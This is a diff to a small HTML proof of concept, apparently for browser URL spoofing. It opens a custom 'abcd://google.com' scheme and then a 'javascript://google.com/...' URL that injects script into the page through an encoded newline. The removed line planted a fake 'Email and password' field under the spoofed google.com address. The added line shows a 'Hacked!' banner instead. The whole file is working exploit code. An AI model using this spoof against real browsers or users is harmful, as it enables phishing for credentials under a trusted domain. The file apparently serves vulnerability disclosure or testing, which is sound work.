--- a/spoof-scheme.html
+++ b/spoof-scheme.html
@@ -1,9 +1,8 @@
 <script>
 function a(){
 	window.open("abcd://google.com", "x");
-	//menggunakan scheme abcd://
 	setTimeout(function(){
-		window.open("javascript://google.com/search?q=google.com&source=/%0adocument.body.innerHTML='`<input type="text" placeholder="Email and password">`'", "x");
+		window.open("javascript://google.com/search?q=google.com&source=/%0adocument.body.innerHTML='%3ch1%20style=color:red%3eHacked!'", "x");
 	}, 111);
 }
 </script> 
